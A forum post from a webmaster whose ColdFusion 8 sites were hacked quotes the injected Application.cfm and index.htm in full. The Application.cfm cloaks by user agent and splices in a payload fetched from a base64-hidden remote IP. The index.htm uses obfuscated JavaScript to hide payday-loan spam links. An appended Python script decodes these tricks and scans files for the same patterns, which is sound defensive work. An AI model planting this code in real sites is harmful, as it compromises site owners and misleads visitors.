Yesterday some of our hosted sites were hacked using the code pasted below. We're running CF 8.01 and I'm wondering if there is a cumulative security patch that we can apply, or if I should just apply every security patch that I can find. I noticed that this particular vulnerability was patched for CF9 and 10 about six weeks ago.
Here's the hack:
- Application.cfm
<!--- Runs on every request. If the visitor's user agent is not "Archivver",
      re-request this same page over CFHTTP with that marker agent, capture the
      real page output, splice remote content into it and send that instead
      (the <cfabort> below stops the normal page from rendering). --->
<cfif (FindNoCase("Archivver",http_user_agent) EQ 0)><cfsavecontent variable="paga"><CFHTTP METHOD = "Get" URL = "http://#SERVER_NAME##SCRIPT_NAME#?#QUERY_STRING#" userAgent = "Archivver">
<cfset mmy = cfhttp.FileContent><cfoutput>
#mmy#
</cfoutput>
</cfsavecontent>
<!--- Fetch the injected payload from a base64-obscured URL (decoded by hSWaawe() below). --->
<CFHTTP METHOD = "Get" URL = "#hSWaawe('aHR0cDovLzE5OS4xOS45NC4xOTQvY2ZzZXQyLnR4dA==')#">
<cfset cfs = cfhttp.FileContent>
<!--- Insert the payload after the first </div>, </table> or </a>; otherwise before </body>. --->
<cfif (FindNoCase("</div>",paga) GT 0)>
<cfset paga = replace(paga, "</div>", "</div>#cfs#", "one")>
<cfelseif (FindNoCase("</table>",paga) GT 0)>
<cfset paga = replace(paga, "</table>", "</table>#cfs#", "one")>
<cfelseif (FindNoCase("</a>",paga) GT 0)>
<cfset paga = replace(paga, "</a>", "</a>#cfs#", "one")>
<cfelse>
<cfset paga = replace(paga, "</body>", "#cfs#</body>", "one")>
</cfif>
<cfoutput>
#paga#
</cfoutput>
<cfabort>
</cfif>
<!--- ToBinary() decodes base64 and ToString() turns the bytes into text:
      a one-line base64 decoder hidden behind a random function name. --->
<cffunction name="hSWaawe">
<cfargument name="HxzcGlk">
<cfset Ypg = ToString(ToBinary(HxzcGlk))>
<cfreturn Ypg>
</cffunction>
- Index.htm
<html>
<head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.thehiltonorlando.com/">
</head>
<body>
<br>
<br>
<br>
<br>
<center>
<a href="http://www.thehiltonorlando.com/">This page has moved. Please click here if you are not automatically redirected in a moment...</a><script language="JavaScript">
// Decodes the four digit-pair strings below and writes a <style> block that
// moves the .zdroq paragraph off-screen, so the spam links stay in the HTML
// for crawlers but are invisible to visitors.
function zdrViewState()
{
var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896','9977918890','949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];
t=z='';
for(v=0;v<m.length;){t+=m.charAt(v++);
if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);
t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}zdrViewState();
</script>
<p class="zdroq">
Most of the time, the borrower would <a href="http://www.paydayloans-online-uk.co.uk/" title="Payday">payday</a> be the one jeopardized. Applying to various payday loan sites could create suspicion to the lender <a href="http://payday-loans-fts.co.uk/" title="Payday Loans">payday loans</a> and this could make the approval process unnecessarily burdening. Having a checking account is also a <a href="http://best-rates-payday-loans.co.uk/" title="Http://best-rates-payday-loans.co.uk/">http://best-rates-payday-loans.co.uk/</a> must. They would also need this in order to withdraw money from your account when the payment is <a href="http://bad-credit-payday.co.uk/" title="Payday Loans Bad Credit">payday loans bad credit</a> due. In the long run, you would see that they have high interest rates that would be equivalent to wasting your <a href="http://payday-loans-eng.co.uk/" title="Payday Loans Uk">payday loans uk</a> money. </p>
</center>
</body>
</html>
Thanks in advance.
--Jeremy
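The two obfuscation tricks in the posted files are cheap to undo offline, and the same few patterns are enough to grep the rest of a webroot for the same injection. The Python below is an added example, not code from the original post or from Adobe: it decodes the base64 URL behind the renamed ToString(ToBinary()) helper, ports the zdrViewState() digit-pair routine so the hidden CSS can be read, and runs a handful of indicator regexes (my own heuristics, not any vendor signature) over sample file contents copied from the post. It assumes the third entry of the JavaScript array is '9977918890' (the post shows a stray space inside it, and the page's class name is "zdroq", which is what that value decodes to); the CLEAN_CFM sample is constructed here for comparison. It says nothing about which hotfix to apply, only how to recognise and triage this particular hack.

```python
"""Triage helpers for the Application.cfm / index.htm injection quoted above.
Added example, not code from the original post; the SAMPLE_* strings are
constructed here by copying the relevant lines of the posted hack."""
import base64
import binascii
import re

# 1. CFML ToString(ToBinary(x)) is a plain base64 decode, so the URL passed to
#    the randomly named helper can be recovered without running ColdFusion.
def decode_cf_b64(s):
    return base64.b64decode(s).decode("utf-8")

# 2. Port of zdrViewState(): every two-digit chunk, plus an offset of
#    (25 - array length + pass number), is a character code. The result is
#    what document.write() emits; the original indexes x[4], which does not
#    exist, so the tag comes out as "<style undefined>" (browsers ignore it).
def decode_zdr(x):
    l = len(x)
    out = list(x)
    for a in range(1, l + 1):
        m = out[l - a]
        t, z = "", ""
        for ch in m:
            t += ch
            if len(t) == 2:
                z += chr(int(t) + 25 - l + a)
                t = ""
        out[l - a] = z
    x4 = out[4] if len(out) > 4 else "undefined"
    return "<" + out[0] + " " + x4 + ">." + out[2] + "{" + out[1] + "}</" + out[0] + ">"

# Array from the posted script; the third entry is assumed to be '9977918890'
# (the post shows a stray space in it, and the page's class name is "zdroq").
ZDR_X = ['9091968376',
         '8887918192818786347374918784939277359287883421333333338896',
         '9977918890',
         '949990793917947998942577939317']

# 3. Heuristic indicators (my own patterns) for the techniques this hack uses.
INDICATORS = {
    "ua_cloaking": re.compile(r'FindNoCase\s*\(\s*"[^"]+"\s*,\s*http_user_agent', re.I),
    "self_fetch": re.compile(r"<cfhttp[^>]*#SERVER_NAME##SCRIPT_NAME#", re.I),
    "cf_base64_decode": re.compile(r"ToString\s*\(\s*ToBinary\s*\(", re.I),
    "remote_include_swap": re.compile(r'replace\s*\(\s*\w+\s*,\s*"</(div|table|a|body)>"', re.I),
    "meta_refresh_offsite": re.compile(r'http-equiv="refresh"[^>]*url=https?://', re.I),
    "js_charcode_writer": re.compile(r"String\.fromCharCode\(parseInt\(", re.I),
}

def scan(text):
    """Return the sorted indicator names that fire on a file's contents."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))

B64_LITERAL = re.compile(r"'([A-Za-z0-9+/]{16,}={0,2})'")

def extract_b64_urls(text):
    """Decode every single-quoted base64-looking literal and keep the URLs."""
    urls = []
    for lit in B64_LITERAL.findall(text):
        try:
            s = base64.b64decode(lit, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            continue
        if s.startswith(("http://", "https://")):
            urls.append(s)
    return urls

# Lines copied from the posted Application.cfm and index.htm.
SAMPLE_APPLICATION_CFM = r"""<cfif (FindNoCase("Archivver",http_user_agent) EQ 0)><cfsavecontent variable="paga"><CFHTTP METHOD = "Get" URL = "http://#SERVER_NAME##SCRIPT_NAME#?#QUERY_STRING#" userAgent = "Archivver">
<CFHTTP METHOD = "Get" URL = "#hSWaawe('aHR0cDovLzE5OS4xOS45NC4xOTQvY2ZzZXQyLnR4dA==')#">
<cfset paga = replace(paga, "</div>", "</div>#cfs#", "one")>
<cfset Ypg = ToString(ToBinary(HxzcGlk))>"""

SAMPLE_INDEX_HTM = r"""<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.thehiltonorlando.com/">
if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);"""

# Constructed benign Application.cfm for comparison.
CLEAN_CFM = r"""<cfapplication name="hosted_site" sessionmanagement="true">
<cfset request.dsn = "siteDB">"""

if __name__ == "__main__":
    print(decode_cf_b64("aHR0cDovLzE5OS4xOS45NC4xOTQvY2ZzZXQyLnR4dA=="))
    print(decode_zdr(ZDR_X))
    for name, sample in [("Application.cfm", SAMPLE_APPLICATION_CFM),
                         ("index.htm", SAMPLE_INDEX_HTM), ("clean", CLEAN_CFM)]:
        print(name, scan(sample), extract_b64_urls(sample))
```

Running it prints the decoded payload URL, the hidden stylesheet (`.zdroq{position:absolute;top:-9999px}`), and which indicators fire on each sample; pointing `scan()` and `extract_b64_urls()` at every .cfm/.cfc/.htm under the hosted sites is the quickest way to find other copies of the same injection and any other hosts the payload is fetched from.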